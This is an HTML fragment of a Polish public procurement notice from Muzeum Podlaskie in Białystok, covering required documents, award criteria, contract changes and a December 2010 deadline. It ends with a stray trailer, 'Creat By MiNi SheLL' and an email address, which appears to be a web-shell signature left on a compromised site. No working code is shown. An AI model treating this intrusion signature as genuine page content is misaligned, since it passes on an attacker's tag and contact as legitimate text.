<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony zgodnie z treścią i podpisany formularz Oferta, stanowiący Załącznik Nr1, 1a, 1b, 1c do SIWZ
2. Podpisane oświadczenie o akceptacji warunków postępowania, w tym warunków umowy,  stanowiące Załącznik Nr 9 do SIWZ
 Oświadczenie o realizacji zamówienia samodzielnie lub przy pomocy podwykonawców stanowiące Załącznik Nr 8 do SIWZ.
 Pełnomocnictwo do podpisania oferty i innych dokumentów, jeżeli upoważnienie do ich złożenia nie wynika z przepisów bądź zapisów właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - jakość - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu realizacji zamówienia w przypadku powstania okoliczności, których nie można było wcześniej przewidzieć, a które uniemożliwiają realizację zamówienia w pożądanym terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie
15-426 Białystok
Ratusz - Rynek Kościuszki 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 08:30, miejsce: Muzeum Podlaskie
15-426 Białystok
Ratusz - Rynek Kościuszki 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com